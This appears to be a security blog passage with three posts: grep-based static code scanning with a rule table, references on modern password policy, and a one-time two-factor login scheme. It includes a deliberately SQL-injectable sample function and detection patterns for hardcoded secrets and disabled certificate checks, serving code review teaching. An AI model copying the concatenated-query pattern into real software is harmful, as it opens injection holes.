Don’t Underestimate Grep Based Code Scanning

Static analysis (SAST) tools are perhaps the most common tool in an AppSec team's endless effort to shift security left. They can be integrated into development pipelines to give developers quick feedback on security bugs, resulting in faster remediation times and a better return on investment for developing secure software.

The SAST market is dominated by a small number of big players that charge high licensing fees for tools that do sophisticated analysis. One of the main features of such tools is data flow analysis, which traces vulnerabilities from source to sink, potentially across a number of files. More information about what such tools can do can be found in this Synopsys report.  These tools can typically take hours or even days to complete a scan, and may use a large amount of memory. Furthermore, some of the tools produce a large number of false positives, and have their own eccentricities. For organisations with deep pockets, the benefits outweigh the costs.

There are lower cost, more efficient SAST tools, but they typically lack the sophistication in terms of the quality of security bug findings. Perhaps the best known low-cost alternative is SonarQube, which is quite popular among developers. SonarQube does very quick scans, but lacks the data flow analysis capability that the more expensive tools have. As a consequence, security findings are reported at a single place in the code (rather than as a source-to-sink trace).

In this blog, we're going to talk about grep-based code scanning, an old-fashioned way of doing SAST. We argue that good grep-based scanning can do reasonably well compared to expensive SAST tools in terms of the quality of bugs found. While grep-based scanning in the form we present it cannot do data flow analysis, we claim that what we miss is not extensive. We also show examples of things we found that our commercial tool at the time missed. While it is certainly possible for the commercial tools to build up their rule sets to catch everything we catch, it falls upon them to add those rules.

I have experience with three leading SAST tools, but considerable experience with only one of them. I'm not going to call out any tools by name, but I do generally see room for improvement in them.

To make this blog as beneficial as possible to readers, we provide a starter pack of grep-based rules that we have used. The tools we have developed are not in a state where they can be open sourced, and we do not have the time to fix them up. However, the rules we provide open the door for somebody with that time to do so. It takes very little effort to build a proof of concept in this way.

This is joint work with Jack Healy.

Tool philosophy

False positives seem part of the game in the SAST market. While I have heard of one tool trying to put considerable focus into removing false positives, I have not experienced such features in the tools that I have worked with — at least not “out of the box.” As a consequence, many tools seem to require manual inspection of the findings to remove the junk and focus on the issues that seem real. In our grep-based scanner, we play by the same rules: we assume that the results are going to be inspected manually, and the person running the tool has a basic understanding of security vulnerabilities and how to identify them in code. Thus, grep-based code scanning assumes a certain level of security competence and language expertise by the person running the code scan.

We take the philosophy that it is okay to have a large number of false positives if we are looking for something that is very serious and too often a problem (for example, SQL injection). We take the philosophy that it is not okay to have a lot of false positives if the issue is not that serious (by CVSS rating). Generally, we are not trying to find everything, but instead trying to maximise the value we get out of our code scanning under a manual inspection time constraint. It's worth spending extra time catching the big fish, not the small ones.

Depending upon how the tool is used, we may under some conditions want to report only things that are high confidence, and ignore everything else. A common example is in a CI/CD environment, where you want to break a build only if you are quite confident that something is wrong. So in our case, we have an option to report only very high confidence results. We also allow developers to flag false positives similar to how SonarQube does it, thus making it developer friendly.

What do we lose by not having data flow analysis?

While the expensive tools have the advantage of data flow analysis, our belief is that we can get a lot of what they get without it. The biggest exception is cross-site scripting, which our grep-based scanner does not find. We consider alternative tooling such as DAST to be an option for finding this serious issue.

Another example of an important issue that we are unlikely to find is logging of sensitive information. Typically that does require some type of data flow analysis: you're almost never going to find code that does something as direct as Log(password).

But something like SQL injection we have found a number of times. The reason is that we report every SQL query we find. Yes, it's noisy, but it takes a code reviewer at most 10 seconds of manual inspection time to see whether there is string concatenation in the query; if there is, it may be vulnerable. If not, the reviewer can quickly dismiss it as a false positive. Obviously more sophisticated code scanning can make this less noisy (for example, regular expression based rules), but this is our starting point.
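
As an illustration of what the reviewer looks for, here is a hypothetical Python snippet (not from any code base we scanned). Both functions would be flagged by a "sql" rule; the first takes a few seconds to confirm as a real problem, the second a few seconds to dismiss:

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'alice@example.com')")

    def find_user_vulnerable(username):
        # String concatenation puts untrusted input directly into the SQL text:
        # classic SQL injection, easy to spot in a manual review.
        query = "SELECT id, email FROM users WHERE name = '" + username + "'"
        return conn.execute(query).fetchall()

    def find_user_safe(username):
        # Parameterised query: the same rule flags it, but the reviewer can
        # dismiss it quickly because no untrusted data enters the SQL text.
        query = "SELECT id, email FROM users WHERE name = ?"
        return conn.execute(query, (username,)).fetchall()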

Certainly tools with data flow analysis are more efficient for something important like SQL injection. However, the benefit from that efficiency is often lost when weighed against how much manual time is spent on false positives for issues that are not that important and/or are low confidence. Furthermore, some tools do not do well at rating the seriousness of a vulnerability: they can be over-zealous in calling too many issues critical or high risk (though this may be configurable). Because of this, the overall usage of our tool, at least for us, seems to require similar manual effort to some of the popular commercial tools despite the simplicity of the design.

Examples of things we found that our main commercial tool missed

Because of the simplicity of our design, and because we assume that a competent reviewer is going to look at the code, we were able to put in rules that help the reviewer find things that big commercial tools tend to miss.

One very fruitful area for finding security bugs is bad crypto. As mentioned in Top 10 Developer Crypto Mistakes, bad crypto is more prevalent than good crypto. Part of the reason for this is bad crypto APIs. Another part of the reason is that the tools don't help developers catch mistakes. Vendors of these tools could find a lot more problems if they were to listen to cryptographers. Our tool flags any use of "crypt" and any other keywords that are indicative of bad cryptography, such as rc4, arcfour, md5, sha1, TripleDES, etc. We go into more detail about crypto bugs in the rule sets.

Another issue that we find surprisingly often, and that our main commercial tool missed, is http://. Of course it should always be https://. Similarly, one can look for ftp:// and other insecure protocols.

There are also a number of dangerous functions that we flag, and these often open up discussions about coding practices. Examples are Angular's trustAsHtml and React's dangerouslySetInnerHTML. In our case, we had to educate the developers on the right approach to handling untrusted data, because they thought it was safe to sanitise data prior to putting it in the database and then use trustAsHtml upon display. We did not agree with this coding style and worked to change it.

One thing that we always like to look at is MVC controller functionality, because sometimes that's where input validation should be applied (at other times you might do it in the model). We often find a lack of input validation, which does not necessarily imply a vulnerability but does show the need for improved defensive programming. Even more interesting, one time when we looked at a controller, we found that it was obviously not doing the access control checks that it should have been doing, and this was one of the most significant findings that we caught. Normally access control problems are not something you would find with a SAST tool, but our different approach to how the tool is used made it work for us.

Sample rules: starter pack

Rules can go on forever, so here I want to just focus on some of the more fruitful ones to get you started. Generally we do a case insensitive grep to find the key word, and then we grep out (“grep -v”) things that got in by chance but are not actually the key word we are looking for. We call these “exceptions” to our rules.  For example “3des” is indicative of the insecure triple DES encryption algorithm, but we wouldn’t want to pull in a variable like “S3Destination”, which our developers might use for Amazon S3 storage (nothing to do with triple DES). We learn the exceptions over time.

A very common grep rule that we need to make exceptions for is "http:".  While we are looking for insecure transport layer communications, the problem is that "http:" is also used in XML namespaces that have nothing to do with transport layer security.  This means we have to grep out things like "xmlns".  Also, writing logic to ignore commented code helps a lot; otherwise you will pull in many false positives like licence references (http://www.apache.org/licenses) or Stack Overflow links, which often occur in comments.
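
As a toy illustration (a hypothetical Python equivalent of the grep pipeline, not our actual tooling), the http: rule with its exceptions might look something like this:

    import re
    from pathlib import Path

    # The keyword we grep for, case insensitive.
    PATTERN = re.compile(r"http:", re.IGNORECASE)
    # Things we "grep -v" away: XML namespaces, licence headers, Stack Overflow links.
    EXCEPTIONS = re.compile(r"xmlns|apache\.org/licenses|stackoverflow\.com", re.IGNORECASE)
    # Crude test for commented-out code; a real tool would do better.
    COMMENT = re.compile(r"^\s*(//|#|\*|/\*|<!--)")

    def scan_file(path):
        for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
            if PATTERN.search(line) and not EXCEPTIONS.search(line) and not COMMENT.match(line):
                print(f"{path}:{lineno}: {line.strip()}")

    for source_file in Path(".").rglob("*.java"):
        if source_file.is_file():
            scan_file(source_file)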

It may look like we omitted some obvious rules in some cases, but sometimes there are subtle reasons. For example, even though we have a lot of crypto rules, we don't do an "ECB" (insecure electronic code book mode of operation) search simply because it is too noisy: the characters "E", "C", and "B" are all valid hexadecimal digits, and we often got false positives from hexadecimal values in code. It was deemed not fruitful enough to keep such a rule (as explained in our design philosophy above).

We also try to group our rules by language to reduce false positives. However, some rules apply to all languages. In our case we are primarily working on web software, so we don't cover languages like C/C++.

Below is the starter pack of rules. Some rules are clearly more noisy than others — people can pick and choose the ones they want to focus on.

Grep string | Look for | Languages
password, passwd, credential, passphrase | Hardcoded passwords, insecure password storage, insecure password transmission, password policy, etc. | all
sql, query( | SQL injection (string concatenation) | all
strcat, strcpy, strncat, strncpy, sprintf, gets | dangerous C functions used in iOS | iOS
setAllowsAnyHTTPSCertificate, validatesSecureCertificate, allowInvalidCertificates, kCFStreamSSLValidatesCertificateChain | disables TLS cert checking | iOS
crypt | hardcoded keys, fixed IVs, confusing encryption with message integrity, hardcoded salts, crypto soup, insecure mode of operation for symmetric cipher, misuse of a hash function, confusing a password with a crypto key, insecure randomness, key size too small. See Top 10 Developer Crypto Mistakes | all
CCCrypt | IV is not optional (Apple API documentation is wrong) if security is required | iOS
md5, sha1, sha-1 | insecure, deprecated hash function | all
3des, des3, TripleDES | insecure, deprecated encryption function | all
debuggable | do not ship debuggable code | android
WRITE_EXTERNAL_STORAGE, sdcard, getExternalStorageDirectory, isExternalStorageWritable | check that sensitive data is not being written to insecure storage | android
MODE_WORLD_READABLE, MODE_WORLD_WRITEABLE | should never make files world readable or writeable | android
SSLSocketFactory | dangerous functionality: insecure API, easy to make mistakes | java
SecretKeySpec | verify that crypto keys are not hardcoded | java
PBEParameterSpec | verify salt is not hardcoded and iteration count is at least 10,000 | java
PasswordDeriveBytes | insecure password-based key derivation function (PBKDF1) | c#
rc4, arcfour | deprecated, insecure stream cipher | all
exec( | remote code execution if user input is sent in | java
eval( | remote code execution if user input is sent in | javascript
http: | insecure transport layer security, need https: | all
ftp: | insecure file transfer, need ftps: | all
ALLOW_ALL_HOSTNAME_VERIFIER, AllowAllHostnameVerifier | certificate checking disabled | java
printStackTrace | should not output stack traces (information disclosure) | java, jsp
readObject( | potential deserialization vulnerability if input is untrusted | java
dangerouslySetInnerHTML | dangerous React functionality (XSS) | javascript
trustAsHtml | dangerous Angular functionality (XSS) | javascript
Math.random( | not cryptographically secure | javascript
java.util.Random | not cryptographically secure | java
SAXParserFactory, DOM4J, XMLInputFactory, TransformerFactory, javax.xml.validation.Validator, SchemaFactory, SAXTransformerFactory, XMLReader, SAXBuilder, SAXReader, javax.xml.bind.Unmarshaller, XPathExpression, DOMSource, StAXSource | vulnerable to XXE by default | java
controller | MVC controller functionality: check for input validation | c#, java
HttpServletRequest | check for input validation | java
request.getParameter | check for input validation | jsp
exec | dynamic SQL: potential for SQL injection | sql
getAcceptedIssuers | if null is returned, then TLS host name verification is disabled | android
isTrusted | if it returns true, then TLS validation is disabled | java
trustmanager | could be used to skip cert checking | java
ServerCertificateValidationCallback | if it returns true, then TLS validation is disabled | c#
checkCertificateName | if set to false, then hostname verification is disabled | c#
checkCertificateRevocationList | if set to false, then CRLs are not checked | c#
NODE_TLS_REJECT_UNAUTHORIZED | certificate checking is disabled | javascript
rejectUnauthorized, insecure, strictSSL, clientPemCrtSignedBySelfSignedRootCaBuffer | cert checking may be disabled | javascript
NSExceptionDomains, NSAllowsArbitraryLoads, NSExceptionAllowsInsecureHTTPLoads | allows http instead of https traffic | iOS
kSSLProtocol3, kSSLProtocol2, kSSLProtocolAll, NSExceptionMinimumTLSVersion | allows insecure SSL communications | iOS
public-read | publicly readable Amazon S3 bucket: make sure no confidential data is stored | all
AWS_KEY | look for hardcoded AWS keys | all
urllib3.disable_warnings | certificate checking may be disabled | python
ssl_version | can be used to allow insecure SSL comms | python
cookie | make sure cookies set the secure and httpOnly attributes | all
kSecAttrAccessibleAlways | insecure keychain access | iOS
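
If you want to drive the whole table programmatically rather than running grep by hand, a minimal sketch might encode each row as data (this is an illustrative toy, not the tool we actually use, and only a few rows are shown):

    import re
    from pathlib import Path

    # (regex of grep strings, what to look for, file globs the rule applies to)
    RULES = [
        (r"password|passwd|credential|passphrase", "hardcoded/insecure password handling", ["*"]),
        (r"md5|sha-?1", "insecure, deprecated hash function", ["*"]),
        (r"SecretKeySpec", "verify that crypto keys are not hardcoded", ["*.java"]),
        (r"dangerouslySetInnerHTML", "dangerous React functionality (XSS)", ["*.js", "*.jsx"]),
    ]

    def scan(root):
        for pattern, description, globs in RULES:
            regex = re.compile(pattern, re.IGNORECASE)
            for glob in globs:
                for path in Path(root).rglob(glob):
                    if not path.is_file():
                        continue
                    for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
                        if regex.search(line):
                            print(f"[{description}] {path}:{lineno}: {line.strip()}")

    scan(".")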

Collection of References on Why Password Policies Need to Change

Organisations like NIST and the UK National Cyber Security Centre (NCSC) are pushing password security policies that are much different from the past. Most notably, password expiry and character composition rules are being dropped, and replaced by other more user friendly recommendations.  Despite their efforts, many organisations are very slow in changing to the modern guidance, and instead remain with password policy practices that are characteristic of 2004 guidance. If you’d like to work towards change in your organisation, it helps to have a useful set of references to pass on to those who write the policies.

Is it worth trying to make the change? In my judgement, an important part of building a positive security culture is considering pain versus value in every decision you make. A lot of historical guidance for password security is high pain and little to no security value according to what we have learned, and sometimes causes more harm than good in ways that policy makers never anticipated. We also must remember that availability is one of the three pillars of security: when users get locked out of their account for reasons that can at least partially be attributed to password security policies, then we are not putting the best face of security forward.  This is especially true when there are better ways to do things:  Security policy writers need to keep their knowledge up to date.

This blog contains information from various sources, including research papers, reports/white papers, popular blogs, government websites, and news organisations. Dates of publication are included so readers can keep in mind that more recent publications are based upon more recent knowledge. While there are many existing blogs on password security, the main contributions here are:

  1. Assembling a large number of modern sources together,
  2. Providing compact summaries of why the sources are relevant to the purpose of making password policy change within an organisation,
  3. Including research publications that show where new recommendations are derived from (thus going beyond “appeal to authority” arguments — the research is there for anybody who cares to check it themselves).

Overview of modern password security guidance

  • (WSJ news article – requires subscription, 2017) The Man Who Wrote Those Password Rules Has a New Tip: N3v$r M1^d!. This article talks about how the author of the classic NIST document that proposed composition rules and similar guidance (NIST Special Publication 800-63 Appendix A) now rejects those recommendations. Those recommendations seemed okay back then, but given what we have learned since, they no longer serve the original intent. New recommendations have been written that balance security with usability needs.
  • (Naked Security news article, 2016) NIST’s new password rules – what you need to know. This is a compact summary of the changes to NIST’s password security guidance. Because the article is short, it is a good way to open up the conversation with people who have limited time or attention span. It tells what policy makers need to change to be in compliance with NIST guidelines.
  • (Troy Hunt blog, 2017) Passwords Evolved: Authentication Guidance for the Modern Era. This is quite a long, but very well written article about the changes to NIST’s password guidance and why the changes are being made. It also draws from the UK government’s guidance and Microsoft’s guidance to strengthen the argument. The section on “Listen to Your Governments (and Smart Tech Companies)” makes a great appeal to authority argument on why companies should take these recommendations seriously. Overall, it is a good read for those who have time and interest to read it.

The new recommendations — original sources

  • (NIST publication, 2017) NIST Special Publication 800-63B. This is right from the horse's mouth, but it's not a document to start the conversation with, because the document is large and uses terminology that will take time for many readers to interpret. It is nevertheless the proof you will need if people question whether NIST is really making such a recommendation. For example, the requirement to not impose composition rules on passwords ("memorized secrets") is given in section 10.2.1. That section also says these secrets should not be required to change periodically. The requirement to not allow hints to recover passwords is given in section 5.1.1.2. The requirement to not allow secret questions for account recovery is better found in NIST's FAQ.
  • (NIST web page FAQ, 2019) NIST Special Publication 800-63: Digital Identity Guidelines Frequently Asked Questions. This is an easier place to start than the NIST original publication, as it is more human readable. It gets right to the point on questions like why composition rules are no longer recommended, why password expiry is no longer recommended, and why secret questions for account recovery are no longer permitted.
  • (NCSC publication, 2018) Password administration for system owners. These recommendations are similar in nature to the NIST recommendations. See the sections on "Don't enforce regular password expiry" and "Do not use complexity requirements". Also worth pointing out are "Reduce your organisation's reliance on passwords" (we have too many passwords already) and "Implement technical solutions", which includes other guidance on helping protect user passwords while not locking users out of their accounts long-term.
  • (NCSC infographic, 2018) NCSC Password Policy Advice for system owners. A simple graphic that shows the risks and how to help improve password security within an organisation. The right half in purple gives password policy recommendations. (Unfortunately, while most of the infographic is good, there is one serious blunder in it: it recommends SHA-256 for password hashing. SHA-256 was not designed for this type of operation. Those who know the cryptography understand this; those who don't can get the understanding from an old Troy Hunt article.)
  • (NCSC blog, 2016) The problems with forcing regular password expiry.  A simple blog that explains why password expiry causes more harm than good. In short, users choose passwords similar to their previous ones and minimally meet the complexity requirement in order to create a password they can memorise. There is also an increased tendency to forget passwords, which causes a productivity cost to an organisation.
  • (Microsoft publication, 2016) Microsoft Password Guidance. This report is great because it is easy to read and gets right to the point. On the first page it enumerates 7 recommendations to system administrators, which include things not to do (do not enforce password expiry or composition rules) and what to do (8 character minimum password, ban common passwords, etc.). Further into the document it goes into more detail and includes references to research reports that justify why the changes are being made. Overall, the clarity, simplicity, and completeness (especially the research references) of this publication make it a top source for referencing to others. However, because it predates the NIST and NCSC changes, it lacks references to NIST's new guidelines. It also lacks details on how organisations can implement the risk-based multi-factor authentication that it recommends.

Research on why password policies need to change

  • (Research paper, 2010) The Security of Modern Password Expiration: An Algorithmic Framework and Empirical Analysis. The main goal of password expiry is to limit the amount of time an attacker has access to an account in the event of password compromise. This paper questions whether that goal is met by analysing a dataset of 7700 accounts to determine whether knowing one password allowed recovering other passwords for that user. The fallacy around password expiry recommendations is that security administrators assume users choose each password randomly and independently of other passwords, but the reality is that the vast majority of users don't. The paper shows that even for websites where users have an incentive to protect their accounts (for example, one holding payroll data), new user passwords tend to be strongly related to previous ones. The study found that they could derive 17% of new passwords within 5 guesses and 41% of new passwords within seconds in an offline attack with little effort. The authors write:

    “Combined with the annoyance that expiration causes users, our evidence suggests it may be appropriate to do away with password expiration altogether, perhaps as a concession while requiring users to invest the effort to select a significantly stronger password than they would otherwise (e.g., a much longer passphrase).”

  • (Research paper, 2010) Testing Metrics for Password Creation Policies by Attacking Large Sets of Revealed Passwords.  When NIST wrote their 2004 Special Publication 800-63, which had the recommendations for password policy, they included entropy estimates of how strong passwords complying with the policy would be. This research does password cracking on sets of real user data to show that those estimates are far too high. Part of the reason for this is that users tend to follow similar patterns when forced to comply with a password policy. For example, when required to use digits, users tend to either choose all digits or put the digits at the end of the password (nearly 85%); when required to use an upper case letter, users tend to use either all upper case or capitalise only the first letter (89%); and when required to use a special character, users tend to put it at the end of the password (28.5%). An attacker can use known human behaviour to increase his chances of success in password cracking attacks. The paper notes that using a password blacklist of 50,000 passwords helps significantly, but not as much as NIST predicted. The authors conclude:

    Our findings were that … most common password creation policies remains vulnerable to online attack. This is due to a subset of the users picking easy to guess passwords that still comply with the password creation policy in place, for example “Password!1”

  • (Research paper, 1999) Users are not the Enemy.  This paper surveys a large number of users to understand the problems they have with password security. While it is true that many users do not assume the responsibility they should for protecting their accounts, the study also finds that part of the problem is the difficulty users have in complying with password security policies. Users have a large number of passwords that need to change regularly, each with different complexity requirements, which makes it much more likely that users will do things they should not do just so they do not lose access to their accounts. The section on "Security needs user-centered design" notes that

    “Many of these [security] mechanisms create overheads for users, or require unworkable user behavior. It is therefore hardly surprising to find, that many users try to circumvent such mechanisms.”

    The paper concludes with a set of recommendations to help users with passwords. However, this paper is old (from 1999) so therefore the recommendations are also subject to the knowledge of the time.

  • (Research paper, 2010) The True Cost of Unusable Password Policies: Password Use in the Wild.  The authors note that users are generally cogent in their understanding of security needs, but find compliance with password policies too difficult. To cope with security demands, users develop their own strategies, which end up introducing their own problems. As a consequence, the complexity of complying with security policies has an adverse effect on the security posture of the organisation. For example, one user dealt with a policy that forced him to choose a password not similar to any of his previous 12 passwords by just writing down the password so he would not forget it. In the section on Towards Holistic Password Policies, the authors note that just looking at the technical side and ignoring the user side does not encourage security awareness; instead it introduces problems that antagonise users. Password policies need to be designed for the context in which users use the systems, with an emphasis on eliminating the risks that they are likely to face in that context.
  • (Research paper, 2007) Do Strong Web Passwords Accomplish Anything?. There are many ways that an attacker may go after a user, and password policies only address defence against brute forcing attacks. They do not address phishing, key logging, shoulder surfing, insecure password storage on local machines, and guessing based upon special knowledge about the user. Although strong passwords do help in some cases, there are other more user-friendly security controls that could be put in place of the complex password policy. These other controls make strong password policies less important. The paper argues

    Since the cost is borne by the user, but the benefit is enjoyed by the bank user resistance to stronger passwords is predictable. We argue that there are better means of addressing brute-force bulk guessing attacks.

    However this paper is from 2007. See next item which is related but more recent:

  • (Blog, 2019) Your Pa$$word doesn’t matter.  This blog unfortunately has a misleading title that caused many readers to misjudge it before reading it. It is not telling users not to choose strong passwords, but instead is saying that password complexity policies have little benefit when considering the various ways that passwords are attacked. In spirit it is similar to the previous item, but this research is more modern. It tells system administrators and security policy writers:

    “Focusing on password rules, rather than things that can really help – like multi-factor authentication (MFA), or great threat detection – is just a distraction.”

  • (Research paper, 2015) Quantifying the Security Advantage of Password Expiration Policies. The abstract gets right to the point:

    “Many security policies force users to change passwords within fixed intervals, with the apparent justification that this improves overall security. However, the implied security benefit has never been explicitly quantified. In this note, we quantify the security advantage of a password expiration policy, finding that the optimal benefit is relatively minor at best, and questionable in light of overall costs.”

    This paper does a mathematical analysis of the benefit of password expiry policies. Without considering the possibility of new passwords being related to old ones, this paper instead considers an attacker who keeps trying to guess the user's password in an online attack, even after the password might have changed without the attacker's knowledge. In essence, they show that the attacker's chance of success is not much different from what it would be if there were no password expiry policy in place. And this is even if the password is chosen randomly (most users don't do this, which makes attacks easier). The authors conclude by challenging those who favour such policies to explain why and in which specific circumstances a substantiating benefit is evident.

  • (Research paper, 2009) It's no secret: Measuring the security and reliability of authentication via 'secret' questions.  Historically, requiring users to provide answers to secret questions upon registration was a way to do account recovery in the event of a forgotten password. This paper analyses these practices and finds that 20% of users forget their own answers to secret questions within 6 months, acquaintances of such people can guess the answers to their secret questions 17% of the time, and 13% of the time an answer could be guessed by an attacker within 5 attempts by trying the most popular answers. The authors conclude that these questions are neither reliable nor do they meet security requirements. They propose a number of options to improve secret questions or to have alternative backup authenticators, but ultimately this paper more than any other led to the removal of secret questions for account recovery.

Other references

  • (Microsoft blog, 2019) Security baseline (FINAL) for Windows 10 v1903 and Windows Server v1903.  The security baselines for Windows 10 and Windows Server no longer enforce periodic password expiration. The blog writes

    “Periodic password expiration is an ancient and obsolete mitigation of very low value, and we don’t believe it’s worthwhile for our baseline to enforce any specific value. By removing it from our baseline rather than recommending a particular value or no expiration, organizations can choose whatever best suits their perceived needs without contradicting our guidance. At the same time, we must reiterate that we strongly recommend additional protections even though they cannot be expressed in our baselines.”

  • (FTC blog, 2016) Time to rethink mandatory password changes.  This is from a former Chief Technologist of the US Federal Trade Commission. The author explains why requiring users to change their passwords does more harm than good, and includes a long list of references like many included here to back up the argument. While there may be reasons for you to change your password (examples given), requiring regular changes in a password policy is not necessarily good practice:

    Research suggests frequent mandatory expiration inconveniences and annoys users without as much security benefit as previously thought, and may even cause some users to behave less securely. Encouraging users to make the effort to create a strong password that they will be able to use for a long time may be a better approach for many organizations…

Concluding remarks

The shortcomings of legacy password policies are well documented; however, there are two distinct philosophies for moving forward.  On one hand, there remains the "fix the user" philosophy, which pushes education and password managers as the main mechanisms for protecting user accounts.  The alternative approach is to design systems that are less reliant upon passwords as the sole determinant for authentication, which is the approach that Google and Microsoft seem to be taking (related: see Protecting User Accounts When Usability Matters).  I honestly believe that both philosophies have a place going forward.  The problem today is that there is way too much emphasis on the former and not enough effort being put into the latter.  We can't always count on people to do the right thing, but there are often things we can do to protect them when they are negligent.  Putting the burden of security complexity on the user should be the last fallback option, not the default option.

Protecting User Accounts When Usability Matters

Scenario: Password guessing attacks are happening on your website. The attacker is performing password spraying: he tries a single password for a user, and if it fails, he moves on to the next user. The attacker is also changing his IP address, including the use of IP addresses that are geolocated where many legitimate users come from.

Because of the attacker’s tactics, blocking IP addresses and account lockouts won’t work. You also work for a business that is very sensitive to security controls that impact usability. Captchas, two-factor authentication, and stronger password security policies are rejected by the business.

What can you do?

This blog is about a security control that largely prevents these types of password guessing attacks with minimal usability impact. We call it One-Time Two Factor Authentication (OT2FA). It's a simple idea derived from a number of sources, including:

Revisiting Defenses Against Large-Scale Online Password Guessing Attacks by Mansour Alsaleh, Mohammad Mannan, and P.C. van Oorschot.
Securing Passwords Against Dictionary Attacks by Benny Pinkas and Tomas Sander.
Enhanced Authentication In Online Banking by Gregory D. Williamson.

OT2FA should not be considered new, as it has strong similarities to what companies like Google and Lastpass are doing (though their implementation details are unpublished). However too many websites are doing alternatives that are both less secure and less user friendly.

One-Time Two Factor Authentication

Two-factor authentication (2FA) is an effective security control for preventing password guessing attacks, but it comes with a large usability impact: users don't like being challenged for a one-time secret code every time they log in. Businesses that are trying to acquire new users to win market share are averse to security controls that annoy users.

But what if one could get close to the security of 2FA with little usability impact? This is what OT2FA aims to accomplish.

The idea is simple: the first time a user logs in from a new user agent (i.e. browser or client software), require them to prove their identity via two factors: their password, and a secret code that is emailed or SMSed to them (note: email is preferable as SMS security is known to be weak). When the user succeeds in proving their identity, provide a digitally signed token, such as a JWT, back to the user agent: "User X signed in from this device before." Instead of the actual user name, something like a UUID should be used for the identity, which is tied to the username inside the server database. The token, called an OT2FA token, serves the purpose of marking that user agent as trusted for that user. For web browsers, it is particularly convenient to store it in a cookie.

The next time that same user logs in from that user agent, they only need to provide the username and password, and the OT2FA token is sent up transparently (no action required from the user) as the second factor proof of identity. The server authenticates the user by verifying that the username and password are correct, the digital signature on the OT2FA token is valid, and the identity of the user in the OT2FA token maps to the username provided. If all are correct, access is granted without requiring a 2FA challenge from the user. In other words, the second factor challenge to the user happens only the first time he logs in from a particular user agent, and then the user never sees the second factor challenge on that user agent again. Hence the name: One-Time Two Factor Authentication.
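
To make the mechanics concrete, here is a minimal sketch of the token handling using Python and the PyJWT library. The key handling, claim names, and in-memory user table are illustrative assumptions, not a prescription:

    import datetime
    import uuid

    import jwt  # PyJWT

    SIGNING_KEY = "replace-with-a-strong-random-key-from-a-secrets-store"

    # Illustrative stand-in for the server database: username -> UUID.
    USER_IDS = {"alice": str(uuid.uuid4())}

    def issue_ot2fa_token(username):
        # Called once, after the user passes the email/SMS second factor challenge.
        claims = {
            "sub": USER_IDS[username],  # the UUID, never the username itself
            "iat": datetime.datetime.now(datetime.timezone.utc),
        }
        return jwt.encode(claims, SIGNING_KEY, algorithm="HS256")

    def verify_ot2fa_token(token, username):
        # Called on later logins; the password check happens separately.
        try:
            claims = jwt.decode(token, SIGNING_KEY, algorithms=["HS256"])
        except jwt.InvalidTokenError:
            return False
        return claims.get("sub") == USER_IDS.get(username)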

This protection is not perfect, but it is a huge improvement in security at little impact to the user. The main thing is that it stops the large scale password guessing attacks: an attacker can only succeed against a user if he not only knows the username and password, but he also can crack the second factor or somehow get the user’s OT2FA token. If we make the assumption that no attacker is going to collect a large number of user OT2FA tokens (discussed further in the Potential Concerns section below), then we would believe that we have stopped the large scale password guessing attacks.

For emphasis, OT2FA is designed only to prevent password guessing attacks against users. There is no need to challenge the user for a second factor when they sign up for an account – new users should get an OT2FA token by default.

Below, we will discuss enhancements and then potential security concerns, but let's first review where we are. In the context of password guessing attacks, username/password-only is low security, but very usable. Two-factor authentication is high security, but scores low on the usability scale. OT2FA is not as secure as 2FA nor as user-friendly as username/password-only, but it is not bad in either category, and could arguably be considered good in both. Therefore OT2FA is a realistic security option for websites built with a strong emphasis on usability.

Enhancements

There are many directions in which one can take this idea.

For example, by including a unique identifier for each OT2FA token and storing the corresponding value in the database, you can give users the option to revoke OT2FA tokens living on trusted devices / user agents that should no longer be trusted for that user. So although you cannot make the OT2FA token go away, you can enforce on the server side that the specific OT2FA token being sent up is one that the user has not revoked. Some subtleties are discussed in Footnote 1 at the bottom.
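
Continuing the illustrative sketch above (same imports and constants), the revocation enhancement might give each token a unique identifier and keep the set of revoked identifiers server side:

    REVOKED_TOKEN_IDS = set()  # in practice a database table, keyed by user

    def issue_revocable_token(username):
        claims = {"sub": USER_IDS[username], "jti": str(uuid.uuid4())}
        return jwt.encode(claims, SIGNING_KEY, algorithm="HS256")

    def verify_revocable_token(token, username):
        try:
            claims = jwt.decode(token, SIGNING_KEY, algorithms=["HS256"])
        except jwt.InvalidTokenError:
            return False
        if claims.get("jti") in REVOKED_TOKEN_IDS:
            return False  # the user revoked this device / user agent
        return claims.get("sub") == USER_IDS.get(username)

    def revoke_token(jti):
        # Exposed to the user through a "manage trusted devices" screen.
        REVOKED_TOKEN_IDS.add(jti)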

As an alternative to maintaining server-side state for revocation purposes, one could expire the OT2FA token. Indeed, many implementations (Gmail, Lastpass, Azure DevOps, etc.) do this with a fixed expiry, and ask the user for a new 2FA challenge on a regular basis. The problem with expiring the token after a fixed interval is that it no longer meets the "one time" requirement of this design.

A more user-friendly approach than fixed token expiry is to set an initial expiry, but generate a new token with extended expiry each time the user returns. This mimics how "remember me" functionality is often implemented. If a user's OT2FA token becomes known to an attacker, the user's only defence then is his password, which needs to be strong enough to prevent the attacker from getting in until the compromised OT2FA token expires.  Although this is less than ideal, attackers are largely limited in the number of accounts they can go after, assuming there is no mass OT2FA token leakage.
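
The sliding expiry variant, again as an illustrative continuation of the same sketch (the lifetime is an arbitrary example, not a recommendation):

    TOKEN_LIFETIME = datetime.timedelta(days=90)

    def reissue_with_extended_expiry(username):
        # On each successful login from a trusted user agent, hand back a fresh
        # token so the expiry keeps sliding forward for active users.
        claims = {
            "sub": USER_IDS[username],
            "exp": datetime.datetime.now(datetime.timezone.utc) + TOKEN_LIFETIME,
        }
        return jwt.encode(claims, SIGNING_KEY, algorithm="HS256")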

Another direction is that OT2FA can be combined with (temporary) account lockout. Different thresholds for failed password attempts can be allowed depending upon whether or not a valid OT2FA token is present. For example, one can impose a temporary lockout when the OT2FA token is not present, but still allow logins when the OT2FA token is present, provided that the second (higher) threshold for failed password attempts is not reached. This easily lets in legitimate users coming from trusted user agents while keeping hackers out. It also mitigates the risk of an attacker trying to lock a legitimate user out of his account.
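
A sketch of the tiered lockout thresholds (the numbers are purely illustrative):

    MAX_FAILURES_WITHOUT_TOKEN = 5   # strangers get locked out (temporarily) quickly
    MAX_FAILURES_WITH_TOKEN = 20     # trusted user agents get more slack

    def login_attempt_allowed(recent_failures, has_valid_ot2fa_token):
        # Temporary lockout decision, made before the password is even checked.
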